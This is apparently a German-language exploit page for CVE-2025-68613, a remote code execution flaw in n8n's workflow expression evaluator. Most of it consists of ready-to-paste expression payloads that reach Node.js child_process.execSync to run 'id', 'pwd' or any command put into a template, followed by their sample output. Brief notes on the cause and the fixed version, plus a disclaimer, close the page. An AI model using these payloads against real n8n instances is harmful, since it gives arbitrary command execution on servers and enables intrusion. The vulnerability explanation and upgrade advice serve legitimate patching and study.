
CVE-2025-68613: n8n RCE-Schwachstellen-Exploit und Dokumentation
n8n enthält eine kritische Schwachstelle zur Ausführung von beliebigem Code (Arbitrary Code Execution) im Ausdrucksauswertungssystem von Workflows. Unter bestimmten Bedingungen können Ausdrücke, die von authentifizierten Benutzern während der Workflow-Konfiguration bereitgestellt werden, in einem Ausführungskontext ausgewertet werden, der nicht ausreichend von der zugrunde liegenden Laufzeitumgebung isoliert ist.
Fügen Sie diesen Payload in das Ausdrucksfeld ein:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

ID-Befehl:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWD-Befehl:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Vorlage für benutzerdefinierte Befehle:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Für den id-Befehl:
uid=1000(node) gid=1000(node) groups=1000(node)
Für den pwd-Befehl:
/app
Dem Ausdrucksbewerter fehlt ein Sanitizer, der Funktionsausdrücke am Zugriff auf this.process (das Node.js-Prozessobjekt) hindert, wodurch Zugriff auf Systemmodule möglich ist.
Upgrade auf n8n v1.122.0 oder höher durchführen.
Haftungsausschluss: Diese Informationen dienen ausschließlich Sandbox- und Bildungszwecken. Die nicht autorisierte Nutzung dieser Informationen zur Ausnutzung von Systemen ist illegal und unethisch. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Schwachstellen testen oder ausnutzen.